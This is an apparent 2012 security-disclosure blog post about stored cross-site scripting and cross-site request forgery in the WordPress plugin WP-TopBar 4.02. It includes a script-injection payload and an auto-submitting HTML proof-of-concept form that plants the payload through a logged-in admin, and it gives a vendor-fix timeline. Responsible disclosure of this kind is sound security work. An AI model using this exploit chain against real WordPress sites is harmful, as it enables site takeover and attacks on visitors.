Saturday, September 15, 2012

WP-TopBar 4.02 CSRF and Stored XSS

# Exploit Title: WP-TopBar 4.02 CSRF and Stored XSS
# Date: 2012-09-13
# Author: Blake Entrekin
# Version: 4.02
-------------------
   Stored XSS
-------------------

The message field (wptbbartext variable) of the wp-topbar.php page is vulnerable to Stored Cross-site Scripting.  This variable is only accessible via the admin menu of the plugin. 

The following code is an example:

</script><script>alert(3)</script>

This code is committed to the database upon submission and will run both under the admin interface when the bar is shown as a preview as well as the front facing page where the bar is set to display.

-------------------
        CSRF
-------------------

Since the previous vulnerability requires a logged in user with permission to update this variable in order to execute, an attacker could use Cross Site Request Forgery to trick a logged in user into performing this attack against themselves.

The wp-topbar.php does not utilize a nonce value when submitting any POST changes.  As a result, this page is vulnerable to Cross Site Request Forgery. 

Proof of Concept Code:

<html>
<head>
    <title></title>
</head>
<body>
<form name="testform" action="https://localhost/wordpress/wp-admin/admin.php?page=wp-topbar.php&action=topbartext&barid=1" method="POST">
    <br>
        <input type="hidden" name="wptbbartext" value="</script><script>onload=alert(3)</script>">
        <input type="hidden" name="wptblinktext" value="whatever">
        <input type="hidden" name="wptblinkurl" value="http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fwp-topbar%2F">
        <input type="hidden" name="wptblinktarget" value="blank">
        <input type="hidden" name="wptbenableimage" value="false">
        <input type="hidden" name="wptbbarimage" value="">
        <input type="hidden" name="update_wptbSettings" value="Update+Settings">
       
</form>
<script type="text/javascript">
        document.testform.submit();
    </script>
</body>
</html>

This script takes advantage of a logged in user to submit the required variables needed to update an existing TopBar with the required settings and includes the Stored XSS from above.  In this example it was tested against a wordpress application running on ‘localhost’ and altered a TopBar with the ‘id’ of 1.  This version of WP-TopBar creates a default TopBar with the id of 1 upon installation.  Any subsequent TopBar created has an id incremented.  It can be assumed that a user is more then likely to still have the default TopBar and easily attack it.

# Vulnerability Timeline
2012-09-04 – Vulnerability Reported
2012-09-05 – Developer Acknowledges
2012-09-10 – Developer Issues Fix (v4.03)
2012-09-15 -  Vulnerability Disclosed

No comments:

Post a Comment